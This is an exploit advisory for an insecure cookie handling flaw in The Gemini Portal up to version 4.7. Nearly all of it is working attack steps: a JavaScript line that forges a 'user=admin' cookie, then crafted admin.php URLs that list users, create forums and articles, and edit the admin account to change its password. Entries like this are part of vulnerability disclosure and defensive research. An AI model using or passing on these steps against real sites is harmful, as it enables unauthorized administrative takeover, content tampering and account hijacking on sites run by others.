The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability
You can access to the admin panel altering the cookie and adding a parameter in the navigation bar. First step: javascript:document.cookie = "user=admin". Second step: navigate by the admin panel adding the parameter '&name=users' in the navigation bar. Examples: to view the main admin panel: http://site/admin.php?page=main&name=users; to list all forums: http://site/admin.php?page=forums&name=users; to post a new forum: http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT; to list articles: http://site/admin.php?page=articles&name=users; to create a new article: http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin; to list all users: http://site/admin.php?page=users&name=users; to edit the admin profile (you can change the password): http://site/admin.php?page=users&name=users&op=edit&user=admin